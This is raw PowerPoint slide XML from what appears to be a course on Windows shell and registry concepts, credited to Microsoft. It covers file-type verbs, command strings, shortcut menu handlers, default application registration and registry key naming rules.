              <a:t> used to launch the command in a console window or batch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) file.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Verb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33179783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For example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>verb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>normally launches a program to open a file. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t> string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> typically looks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>follows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>My Program.exe" "%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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73</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Verb Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11564527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708920"/>
            <a:ext cx="7876397" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Verbs can also have a display name associated with them, which is displayed on the shortcut menu instead of the verb string itself. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example, the display string for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>openas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Open With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </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74</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Verb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Display Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33128403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7804389" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shortcut menu handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, also known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>context menu handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>verb handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, are a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>file type handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>handlers may be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>implemented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>in a way that causes them to load in their own process or in the explorer, or other 3rd party processes. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>care when creating in-process handlers as they can cause harm to the process that loads them.</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75</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Shortcut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Menu Handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28574668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gn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" dirty="0" smtClean="0"/>
              <a:t>Supplementary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" i="1"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76</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9560007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2564904"/>
            <a:ext cx="8928991" cy="3816423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Defining shortcut menu items for a particular file type allows you to specify how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>the associated application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> opens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>a member of the file type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, applications can also register </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>a separate default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0"/>
              <a:t>procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>be used when a user attempts to use the application to open a file type that is not associated with the application. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The default procedure serves two basic purposes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>register the default procedure in much the same way you register shortcut menu items. For more detailed information about defining shortcut menu items, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Creating Context Menu Handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a: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77</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Register an Application to Handle Arbitrary File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38343077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One is to specify how your application should be invoked to open an arbitrary file type. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>could, for instance, use a command-line flag to indicate that an unknown file type is being opened. </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78</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>First Purpose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1202614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2675467"/>
            <a:ext cx="8424936" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The other purpose is to define the various characteristics of a file type, such as the shortcut menu items and the icon. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a user associates your application with an additional file type, that class will have these characteristics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the additional file type was previously associated with another application, these characteristics will replace the originals.</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79</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Purpose  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3519664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Each key has a name consisting of one or more printable characters. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>names are not case sensitive. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>names cannot include the backslash character (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>), but any other printable character can be used. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="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8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Key Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13288899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5496" y="2675467"/>
            <a:ext cx="9001000" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
